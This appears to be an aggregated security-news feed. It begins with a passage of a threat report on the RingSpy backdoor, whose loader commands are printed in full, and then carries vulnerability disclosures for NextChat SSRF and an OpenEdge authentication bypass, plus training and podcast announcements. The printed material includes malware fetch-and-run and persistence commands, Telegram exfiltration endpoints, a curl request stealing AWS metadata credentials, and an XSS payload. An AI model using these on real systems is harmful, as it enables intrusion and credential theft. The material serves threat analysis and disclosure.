    curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • download the file via the previously obtained link:
    set /p B=<"C:\Users\[redacted]\AppData\Local\r"
    curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • delete the file with the download link:
    del /s /q "C:\Users\thesage\AppData\Local\r
  • run the downloaded file with the help of .vbs:
    call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat
  • self-delete after the launch:
    (goto) 2>nul & del "%~f0"

The running of the i.bat script makes it possible to:

  • prevent the repeat installation by checking the presence of the file C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db; if missing, the file is created and its execution continues:
    if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
    exit 0
    )
    echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db"
  • obtain the download address; download, open, and delete the decoy document (see the screenshot below) as well as delete the file with the download link:
    curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%PDF_FOLDER%\r"
    curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
    del /s /q "%PDF_FOLDER%\r"
Decoy document
  • download the Python interpreter from the official website and unpack it to the folder C:\Users\[redacted]\AppData\Local\Python, and finally delete the archive:
    curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
    if exist "%FOLDER%" (
    rmdir /s /q "%FOLDER%"
    mkdir "%FOLDER%"
    ) else (
    mkdir "%FOLDER%"
    )
    tar -xf %localappdata%\python.zip -C "%FOLDER%"
    del /s /q %localappdata%\python.zip.
    The variables used are:
    FOLDER=%localappdata%\Python
    PYTHON_VERSION_FIRST_TWO_PARTS=3.11
    PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
  • assign an attribute to the hidden folder C:\Users\[redacted]\AppData\Local\Python:
    attrib +h "%FOLDER%" /s /d
  • create the file C:\Users\[redacted]\AppData\Local\python311._pth with the following content:
    Lib/site-packages
    python.zip
    .
    # Uncomment to run site.main() automatically
    import site
  • obtain and launch the pip installer to download additional packets:
    (cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
    call python -m pip install requests
    call python -m pip install schedule
    del /s /q get-pip.py
  • save the configuration for connecting RingSpy with a Telegram bot in the file C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud
  • download RingSpy’s Python script via the Yandex Cloud API:
    curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%FOLDER%\r"
    echo "%B:~9,426%"
    curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    del /s /q "%FOLDER%\r"
    Where the .vbs file exists in the folder C:\Users\[user]\AppData\Local, it is deleted.
  • create the python.vbs file in the folder C:\Users\[redacted]\AppData\Local\Python with the following content:
    Set oShell = CreateObject("Wscript.Shell")
    oShell.Run “C:\Users\[redacted]\AppData\Local\Python\python.exe” "C:\Users\[redacted]\AppData\Local\Python\f.py” , 0, true
  • copy the created file to the startup folder:
    copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
  • execute the created file:
    call "%localappdata%\Python\python.vbs"
  • run the downloaded backdoor file and self-delete, even if the.vbs file is missing:
    (goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"

The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the -f launch option enabled, RingSpy creates a scheduled task to run the python.vbs script every minute:

powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1

The backdoor’s C2 server is a Telegram bot. When the commands are successfully executed, their output is recorded into the file C:\Users\[redacted]\AppData\Local\Python\rs.txt to be sent as a file to the C2 server.

Downloading the file from the specified network location requires the following PowerShell command:

powershell.exe Invoke-WebRequest -Uri "http://[network resource]/[file name]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[file name]"

The files are sent to the C2 sever via https://api.telegram.org/bot[bot token]/sendDocument while the text is transferred through https://api.telegram.org/bot[bot token]/sendMessage.

Indicators of compromise

5183844b5e67e204efa4b44e12fa8f4e
76b0c05bf735fc5e792041842c4b486a9bf750d1
9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

Conclusions

The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round-the-clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.

Cloud security training: Build secure cloud systems

By: OffSec
12 March 2024 at 13:44

The cloud’s potential is undeniable – but securing it remains a daunting challenge. A recent SC Magazine survey revealed a troubling statistic: one in four companies cite a critical cloud security skills gap. This gap leaves organizations vulnerable, as attackers exploit everything from exposed cloud storage buckets to vulnerabilities in development pipelines. Generic tutorials and vendor-focused hype aren’t enough –  teams need hands-on experience to grasp the complexities of real-world cloud security. That’s where  OffSec’s new Cloud Essentials and Offensive Cloud Learning Paths deliver, providing the actionable training you need to bolster cloud security – whether you’re building cloud environments or testing their resilience.

OffSec’s answer: Build real-world cloud security expertise

Too much cloud training focuses on abstract concepts and vendor-specific tools, leaving you ill-equipped to handle the realities of cloud security.

... Read more »

The post Cloud security training: Build secure cloud systems appeared first on OffSec.

Cybersecurity training aligned with the MITRE ATT&CK framework

By: OffSec
12 March 2024 at 13:11

The MITRE ATT&CK framework was developed in 2013 as a knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is a foundation for specific threat models and methodologies in the private sector, government, and cybersecurity product and service community.

This MITRE ATT&CK Enterprise framework is used by many of our customers to understand their teams’ existing skills and develop new learning plans to address skill gaps and protect the organization’s attack surface.

As we continue to meet our mission to empower individuals and organizations to fight cyber threats with indispensable cybersecurity skills and resources, we’ve developed 12 learning paths that are aligned with the MITRE ATT&CK framework. OffSec training and content cover nearly 70% of the skills required to match the entire attack framework.

... Read more »

The post Cybersecurity training aligned with the MITRE ATT&CK framework appeared first on OffSec.

A CTI Analyst Homelab

11 March 2024 at 19:13
Intro # As career plans, personal interests and the overall curiosity of exploring new technologies change, so does a homelab. It has been a few years since my last homelab writeup and at the time, the focus was geared towards malware analysis without much else. Career goals have shifted to more of a defensive side towards threat hunting and detection engineering so I wanted to build something to support those two fields.

CISSP exam tips and tricks: Avoiding common mistakes | Cyber Work Hacks

By: Infosec
11 March 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CISSP exam! This is part one of a two-part Cyber Work in which Infosec’s CISSP boot camp instructor Steve Spearman gives you his top tips and tricks for taking the CISSP exam! In part one, we’ll talk about what makes the CISSP such a difficult exam, common mistakes people make while taking the exam and what to do if, heaven forbid, you don’t pass on the first try. You don’t have to do this alone, but you need to listen to Spearman's suggestions.

– Learn more about the CISSP: https://resources.infosecinstitute.com/overview/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/

0:00 - CISSP exam tips
1:43 - What makes the CISSP challenging? 
4:51 - Common mistakes taking the CISSP
8:00 - Tricks for taking the CISSP test
11:40 - Advice on retaking the test
16:05 - Best advice for CISSP exam day
16:36 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To

11 March 2024 at 13:01

With the advent of generative AI, AI chatbots are everywhere. While users can chat with large-langage models (LLMs) using a SaaS provider like OpenAI, there are lots of standalone chatbot applications available for users to deploy and use too. These standalone applications generally offer a richer user interface than OpenAI, additional features such as the ability to plug in and test different models, and the ability to potentially bypass IP block restrictions.

From our research, the most widely deployed standalone Gen AI chatbot is NextChat, a.k.a ChatGPT-Next-Web. This is a GitHub project with 63K+ stars and 52K+ forks. The Shodan query  title:NextChat,"ChatGPT Next Web" pulls up 7500+ exposed instances, mostly in China and the US.

This application is vulnerable to a critical full-read server-side request forgery (SSRF) vulnerability, CVE-2023-49785, that we disclosed to the vendor in November 2023. As of this writing, there is no patch for the vulnerability, and since 90+ days has passed since our original disclosure, we are now releasing full details here.

CVE-2023-49785: A Super SSRF

NextChat is a Next.js-based Javascript application, and most of its functionality is implemented as client-side code.

There are, however, a few exposed server endpoints. One of these endpoints is at /api/cors, and it functions by design as an open proxy, allowing unauthenticated users to send arbitrary HTTP requests through it. This endpoint appears to have been added to support saving client-side chat data to WebDAV servers. The presence of this endpoint is an anti-pattern: it allows clients to bypass built in browser protections for accessing cross-domain resources by accessing them through a server-side endpoint instead.

For instance to access Google through this proxy, one can make the following request:

SSRF vulnerabilities vary considerably in terms of real-world impact. This particular SSRF is about as bad as it gets. It’s dangerous because:

  • It enables access to arbitrary HTTP endpoints, including any internal endpoints
  • It returns the full response from any accessed HTTP endpoints
  • It supports arbitrary HTTP methods such as POST, PUT, etc by setting the method header. Request bodies are also passed along.
  • URL query parameters can be passed along with URL encoding.
  • It supports passing along an Authorization header in requests.

If this application is exposed on the Internet, an attacker essentially has full access to any other HTTP resources accessible in the same internal network as the application. The only limitation is passing along other headers such as Cookie or Content-Type, though there may be creative ways to inject these headers.

Here’s an example of accessing the AWS cloud metadata service to retrieve AWS access keys off an AWS EC2 instance running with IMDSv1 enabled:

sh-3.2# curl http://54.145.48.76:3000/api/cors/http/169.254.169.254/latest/meta-data/iam/security-credentials/REDACTED
{
  "Code" : "Success",
  "LastUpdated" : "2024-03-08T00:22:17Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA-REDACTED",
  "SecretAccessKey" : "C2CW-REDACTED",
  "Token" : "IQoJb3JpZ2luX2VjENH-REDACTED",
  "Expiration" : "2024-03-08T06:58:15Z"
}

Reflected XSS

Almost all reflected XSS vulnerabilities are of little value to attackers. But we thought it was interesting to note that this vulnerability can be used to directly trigger an XSS without loading another site. This is because the fetch method used by the /api/cors endpoint also supports the data protocol.

For instance, the following payload:

data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23

will be decoded to <script>alert(document.domain)</script> at the server and sent back to the client, resulting in XSS:

Mitigations

Our assessment of this vulnerability puts the CVE base score at 9.1 (critical). The vulnerability not only enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies.

As of this writing, there is no patch for the vulnerability. More than 90 days has passed since our original contact.

  • Nov. 25, 2023: Horizon3 reports security issue to ChatGPT-Next-Web via GitHub vulnerability disclosure process
  • Nov. 26, 2023: Vendor accepts the report
  • Dec. 6, 2023: GitHub CNA reserves CVE-2023-49785
  • Jan. 15, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 7, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 11, 2024: Public disclosure

We recommend that users not expose this application on the Internet. If it must be exposed to the Internet, ensure it is an isolated network with no access to any other internal resources. Beware that attackers can still use the application as an open proxy to disguise malicious traffic to other targets through it.

Detection

The following nuclei template can be used to detect this vulnerability. The vulnerable code was introduced in Sept. 2023. The majority of instances online, including any instances using the more recent “NextChat” name, are highly likely to be vulnerable.

id: CVE-2023-49785

info:
  name: CVE-2023-49785
  author: nvn1729
  severity: critical
  description: Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  remediation: |
    Do not expose to the Internet
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
  tags: cve-2023-49785,ssrf,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS interaction from second request
        words:
          - "dns"
      
      - type: dsl
        dsl:
          - 'contains(body_1, "<script>alert(document.domain)</script>") && contains(header_1, "text/html")' # XSS validation in first request
          - 'contains(header_2, "X-Interactsh-Version")' # Or got HTTP response back from Interact server

Conclusion

Over the last two years, we have observed the rapid pace of development of new generative AI applications, and there is a big appetite to use and experiment with these applications. We’ve also observed a steady blurring of lines between personal use and corporate use. While NextChat is primarily meant for personal use, we’ve seen it in a few of our own client environments.

Security has simply not kept up, both AppSec practices and vulnerability disclosure processes. The focus of the infosec community and media at large has been on “security harms” like prompt injection or model poisoning, but there are lots of high impact, conventional vulnerabilities to be found. We recommend users exercise caution when exposing any unvetted Gen AI tools to the Internet.

References

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

The post NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To appeared first on Horizon3.ai.

CVE-2024-1403: Progress OpenEdge Authentication Bypass Deep-Dive

6 March 2024 at 16:58

On February 27, 2024, Progress released a security advisory for OpenEdge, their application development and deployment platform suite. The advisory details that there exists an authentication bypass vulnerability which effects certain components of the OpenEdge platform. Our proof of concept can be found here.

When the OpenEdge Authentication Gateway (OEAG) is configured with an OpenEdge Domain that uses the OS local authentication provider to grant user-id and password logins on operating platforms supported by active releases of OpenEdge, a vulnerability in the authentication routines may lead to unauthorized access on attempted logins.

Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access.

OpenEdge Architecture

The OpenEdge platform has several different components that can be deployed across an environment:

  1. OpenEdge Management (an enterprise version of OpenEdge Explorer)
  2. OpenEdge Enterprise RDBMS
  3. OpenEdge Replication
  4. OpenEdge Authentication Gateway (OEAG)
  5. Progress Application Server (PAS) for OpenEdge
  6. Progress Develop Studio (PDS) for OpenEdge

Typically the OpenEdge Management, OpenEdge Enterprise RDBMS, and PAS roles are deployed on a system and act as the backend, central source of information for developers using PDS as clients to develop applications. If an the Authentication Gateway is in use, it centrally manages authentication across the OpenEdge ecosystem.

Figure 1. Example OpenEdge Deployment

Finding The Vulnerable Component

In this case, we were unable to obtain a patched system to perform patch diffing, but there are quite a few interesting details that can be picked from the advisory. The advisory states: “The AdminServer logins are always potentially vulnerable because they only support OS local logins”. Additionally the temporary mitigations specify:

The following mitigation options are intended for short-term use until you can apply the provided OpenEdge Update to your deployments. The revised “auth.dll” library associated with the OS you’re using should be copied into $DLC/bin to replace the vulnerable version of the “auth.dll” library that existed in LTS Updates 11.7.18, 12.2.13 or 12.8.0.

Given this information, we install OpenEdge Manager, RDBMS, and PAS on a single Windows server and inspect the installed services with TaskManager and find that these roles will start the vulnerable “AdminServer” service referenced in the advisory.

Figure 2. AdminServer service running

Now that we have the vulnerable component running – an often overlooked part of reversing is spending hours reading documentation, we find documentation on the AdminServer service and what its used for. The documentation states that its a Java RMI service listening by default on tcp/20931 and references several command line utilities to communicate with the service:

  • This is the RMI port used by command line utilities: proadsv, asbman, wtbman, nsman, restman, and pre OpenEdge 12.0 fathom cmd line tooling
  • The default listening port for the AdminServer (-port) remains 20931 for all versions.

Inspecting our listening connections on the Windows server, we find that the AdminServer is indeed listening on tcp/20931.

Figure 3. AdminServer service listening

Inspecting the command use to kick off the Java process we find it’s loading several Progress JARs and calling com.progress.chimera.adminserver.AdminServerStarter.

Figure 4. AdminServer command line

Reversing the AdminServer Service

We find that the com.progress.chimera.adminserver.AdminServerStarter class is defined in C:\Progress\OpenEdge\java\progress.jar. Inspecting the class, we find that when a remote connection is made the connect() method is called and expects a user supplied username and password.

Figure 5. AdminServer connect()

The connect() method interestingly loads a native system library, auth.dll, and eventually calls the authorizeUser() method defined in it. Replacing auth.dll was mentioned in the temporary mitigations so we’re likely on the right track.

Figure 6. Loading auth.dll

Opening up auth.dll in Ghidra, we find that it exports several functions to be available as Java interfaces, one of which is our authorizeUser() function.

Figure 7. Java Interfaces from auth.dll

The authorizeUser() function performs some basic input validation, ensures the supplied credentials meet certain criteria, and passes control to a function we named vulnerable_checks() (defined at 0x1800051a0). This function does further validation, but getting right into the meat of the vulnerability we see that on line 262 the user supplied AccountName (username) is compared the NT AUTHORITY/SYSTEM. If it matches, you are authenticated.

Figure 8. If username == “NT AUTHORITY/SYSTEM”: you may pass

Thats the vulnerability.

Figure 9. Its a feature

Impact

While we’ve bypassed authentication, finding attack surface to abuse to drive some impact like remote code execution was the next goal.

Deserialization

Java Remote Method Invocation (RMI) interfaces typically suffer from deserialization vulnerabilities, but in this case there were no classic libraries in the class path of the service to easily abuse with a ysoserial gadget. We did confirm that deserialization is possible with a simple out-of-band DNS request payload, but did not spend the time to develop a custom gadget with the in scope libraries. Remote code execution is likely possible with this avenue.

Abuse of Built In Functionality

We spent the better part of a day looking for easily abusable functionality within the available RMI interfaces. Easily reachable functionality allows a user to start, stop, and list performance metrics of applications. Deeper attacker surface looks like it may allow a user to deploy new applications via remote WAR file references, but the complexity increased dramatically in order to reach this attack surface because of the use of internal service message brokers and custom messages. We believe there is again likely an avenue to remote code execution via built in functionality given enough research effort.

Creating a Proof of Concept

We continue our investigation by re-examining the AdminServer class and dbman.bat which makes use of the AdminServer. We find that we can connect to the AdminServer over RMI at rmi://<target_ip>:29031/Chimera. We get back an IAdminServerConnection which exposes two connect methods that require a username and password. With our knowledge from dbman.bat we know we need to encode the username and password using an Encoder from oeauth-12.8.0.jar.

Now that we are connected to the AdminServer, what can we do? We can use the following code to display all interfaces available to us from the AdminServer‘s getPlugins method:

We get the following output:

com.progress.system.SystemPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.agent.database.IAgentPlugIn
com.progress.ubroker.tools.NSRemoteObject
com.progress.chimera.common.IChimeraHierarchy
com.progress.ubroker.tools.IYodaRMI
com.progress.ubroker.tools.IYodaSharedResources
com.progress.ubroker.tools.UBRemoteCommand
com.progress.chimera.common.IChimeraRemoteCommand
com.progress.juniper.admin.JAPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.juniper.admin.IJAPlugIn
com.progress.agent.smdatabase.SMPlugIn
com.progress.chimera.common.IChimeraRemoteObject

From here, we leave it as an exercise to the reader to figure out what you can do with the above interfaces. Our proof of concept can be found here.

NOTE: We will not be distributing the Progress JARs given we do not own that code. These JARs can be obtained from an OpenEdge installation and are required to run the proof of concept.

Indicators of Compromise

When a connection is made to the AdminServer service, logs are generated at C:\OpenEdge\WRK\admserv. An example log entry can be seen below where it records the user authenticating as well as the Java interfaces that user is accessing, the UBRemoteCommand class in our case. While it seems that accessing this service via the NT AUTHORITY/SERVICE account was intended, we did not observe log entries associated to this account outside of service startup. We also were not running a production server where more service traffic may be generated and observed.

The post CVE-2024-1403: Progress OpenEdge Authentication Bypass Deep-Dive appeared first on Horizon3.ai.

Horizon3.ai Unveils Pentesting Services for Compliance Ahead of PCI DSS v4.0 Rollout

5 March 2024 at 14:04

Business Wire 03/05/2024

Horizon3.ai, a pioneer in autonomous security solutions, today announced the availability of the Horizon3.ai Pentesting Services for Compliance. Horizon3.ai recognizes that demand for pentesting expertise is at an all-time high…

Read the entire article here

The post Horizon3.ai Unveils Pentesting Services for Compliance Ahead of PCI DSS v4.0 Rollout appeared first on Horizon3.ai.

What help do CISOs need in 2024? | Guest Alicia Olson

By: Infosec
4 March 2024 at 20:00

Alicia Olson, VP of Communications at Optiv, is today's guest. Olson came to cybersecurity from the oil and gas sector. She tells us how she got interested in communications for security professionals, explains how she turned Optiv’s distributed workforce into a cohesive unit and gives CISOs some crucial advice and ideas for dealing with that moment that no one wants to have to explain — the inevitable security breach. 

0:00 - What do CISOs need in 2024?
1:40 - Working in communications
3:50 - Average workday as a VP of communications
6:56 - Cybersecurity issues with communications 
9:50 - Why work in cybersecurity communications? 
13:00 - How to enter cybersecurity communication roles
17:50 - Women mentoring women in cybersecurity 
19:35 - Supporting DEI in cybersecurity
23:00 - Biggest problems for CISOs in 2024
25:05 - Missing CISO skills you should learn
27:38 - Remediation in cybersecurity communication
29:30 - Olson's best piece of career advice
30:15 - Learn more about Optiv
30:55 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

What’s the true impact on your organization when an employee is phished?

29 February 2024 at 20:13

You can now fully assess the impact of phished credentials on your organization. Tune into this webinar to watch the NodeZero platform evaluating the blast radius of every phished credential as it comes in using the Phishing Impact test.

The post What’s the true impact on your organization when an employee is phished? appeared first on Horizon3.ai.

What a CISSP boot camp is like | Cyber Work Hacks

By: Infosec
29 February 2024 at 19:00

Infosec and the Cyber Work Hacks podcast are here to help you prepare for and pass the CISSP exam from ISC2. For today’s hack, we’re talking boot camps. If you’ve been preparing for the Certified Information Systems Security Professional (CISSP) study guide for six months or more, you might learn better in a concentrated, focused environment with expert instruction. 

And that expert is Infosec boot camp instructor Steve Spearman, who has helped hundreds of learners prepare for and pass their CISSP. Steve will walk you through what the Infosec 7-day CISSP boot camp is like, which can make the difference between passing on the first try and the headache and heartache of having to re-sit the exam. 

0:00 - What is a CISSP boot camp?
1:37 - A boot camp versus university cybersecurity education
2:47 - What is a cybersecurity boot camp schedule like? 
6:54 - Cybersecurity boot camp communication 
9:50 - Cybersecurity boot camp homework
12:13 - Taking a cybersecurity certification exam
15:44 - Is a cybersecurity boot camp right for me? 
17:36 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Conosciamo Alessio Romano – Penetration Tester

By: o___o
28 February 2024 at 06:39
Il mio primo approccio al mondo dell’informatica, differentemente da quanto ci si aspetterebbe, è stato simile a quello di molti altri che, come me, sono nati alla fine degli anni ’90: la prima volta che ho interagito con un computer non ho fatto altro che accenderlo, aprire un file mp3 con il media player di […]

Ethical hacking careers vs. cinema: What it's like to work as a hacker | Cyber Work Live

By: Infosec
26 February 2024 at 19:00

Don't believe the movies and TV shows — ethical hacking is not done by frantically typing on the keyboard in a race against the clock.

What's a career in ethical hacking and penetration testing really like? Join our panel of experts who have worked in the field for decades to find out!

In this one-hour live event, we'll cover:

0:00 - Ethical hacking fact vs fiction
7:45 - First, getting into cybersecurity
12:00 - Does ethical hacking fiction affect people?
19:20 - Cybersecurity students in higher ed
26:17 - Qualifying for penetration testing jobs
31:21 - A real-life cybersecurity attack
42:30 - Does Hollywood inspire cybersecurity workers?
44:30 - U.S. Cybergames
47:40 - Infosec Skills and real-life learning
50:35 - Cybersecurity career jump
53:30 - Criminal justice and cybersecurity
56:25 - From IT support to cybersecurity
59:00 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

❌
❌